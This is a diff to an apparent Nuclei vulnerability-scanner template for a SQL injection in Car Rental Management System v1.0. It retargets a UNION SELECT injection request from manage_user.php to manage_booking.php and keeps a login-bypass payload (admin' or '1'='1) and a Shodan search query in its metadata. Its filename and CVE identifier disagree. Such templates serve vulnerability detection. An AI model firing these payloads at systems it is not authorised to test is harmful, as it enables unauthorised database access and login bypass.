diff --git a/cves/2022/CVE-2022-32026.yaml b/cves/2022/CVE-2022-32026.yaml index 87ade5dd85..53937fa44c 100644 --- a/cves/2022/CVE-2022-32026.yaml +++ b/cves/2022/CVE-2022-32026.yaml @@ -5,20 +5,20 @@ info: author: arafatansari severity: high description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_booking.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + verified: true shodan-query: http.html:"Car Rental Management System" - verified: "true" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: @@ -32,9 +32,8 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 Host: {{Hostname}} skip-variables-check: true